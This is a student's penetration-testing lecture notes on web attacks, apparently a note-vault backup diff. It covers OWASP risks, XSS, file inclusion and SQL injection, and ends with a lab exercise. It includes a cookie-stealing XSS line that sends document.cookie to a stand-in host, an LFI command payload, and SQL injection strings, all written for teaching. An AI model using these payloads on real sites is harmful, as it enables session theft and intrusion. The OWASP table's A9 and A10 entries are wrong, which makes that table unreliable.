vault backup: 2025-03-16 18:59:42

Penetration Testing/Week 22/Week 22 - Web Attacks.md

@@ -0,0 +1,81 @@
+**Slide 1: Web Application Attacks**
+- **Web applications** can be written in various languages, each with its specific vulnerability classes.
+- Main attack vectors are similar in concept.
+- OWASP promotes security awareness and solutions for web application development.
+
+**Slide 2: OWASP Top-10 Security Risks**
+
+| Risk | Description |
+| --- | --- |
+| A1:2017 - Injection | Attacker can add malicious SQL, NoSQL, or command strings. |
+| A2:2017 - Broken Authentication | Compromised credentials, weak defaults, or exposed keys. |
+| A3:2017 - Sensitive Data Exposure | Unprotected data at rest or in transit. |
+| A4:2017 - XML External Entity (XXE) | Attacker can exploit parsing of XML outside the standard. |
+| A5:2017 - Security Misconfiguration | Default configurations, open cloud storage, misconfigured HTTP headers. |
+| A6:2017 - Using Components with Known Vulnerabilities | Outdated or vulnerable libraries and frameworks. |
+| A7:2017 - Insufficient Logging & Monitoring | Lack of logging and monitoring prevents detection of attacks. |
+| A8:2017 - Insecure Deserialization | Vulnerable deserialization can lead to remote code execution. |
+| A9:2017 - Using Known Vulnerable Components without Patching | Outdated software with known vulnerabilities. |
+| A10:2017 - Insufficient Transport Layer Protection | Weak or no encryption, allowing man-in-the-middle attacks. |
+
+**Slide 3: Cross-Site Scripting (XSS)**
+- Unsanitized user input displayed as HTML.
+- Allows malicious scripts to run in victim's browser.
+  - Reflected (non-persistent): injected script runs immediately when the victim clicks the link.
+  - Stored (persistent): web application delivers payload to the victim, script runs when viewed.
+- Impact: cookie stealing, authentication bypass, redirection.
+
+**Slide 4: XSS Example**
+- Reflected XSS:
+
+```html
+<h1>XSS demo</h1>
+<?php echo "Hello ". $_GET['name'];?>
+```
+
+- Stored XSS:
+
+```html
+<script>alert(1)</script>
+```
+
+**Slide 5: Cookie Stealing via XSS**
+- JavaScript can make victim's browser send cookies to the attacker.
+
+```javascript
+new Image().src="http://example.com/bogus.php?output="+document.cookie;
+```
+
+**Slide 6: File Inclusion Vulnerabilities**
+- Local File Inclusion (LFI) and Remote File Inclusion (RFI):
+  - LFI: includes local files.
+  - RFI: introduces own code to the webserver.
+- Exploit depends on PHP versions and web server configurations.
+
+**Slide 7: LFI Demonstration**
+- Unsanitized `lang` parameter:
+
+```php
+<?php $lang=$_GET['lang']; include $lang.".php";?>
+```
+
+- Payload:
+
+```bash
+../uploads/avatars/image.jpg%00&cmd=ifconfig
+```
+
+**Slide 8: SQL Injection**
+- Unsanitized user input passed to a database query.
+- Manipulating data can change the nature of the query.
+- Examples:
+  - Bypassing authentication with `' OR '1'='1`
+  - Extracting data using `' union select * from information_schema.columns --`
+
+**Exercise:**
+- Using OWASP Broken Web Applications project, demonstrate obtaining a shell with:
+  - An LFI vulnerability in the web application with file upload.
+  - An LFI vulnerability in the web application with contaminated logs.
+  - An RFI vulnerability in the web application.
+- Demonstrate attacks using SQL injection and Cross Site Scripting (XSS).
+- Provide documentation and proof of useful attacks in your report.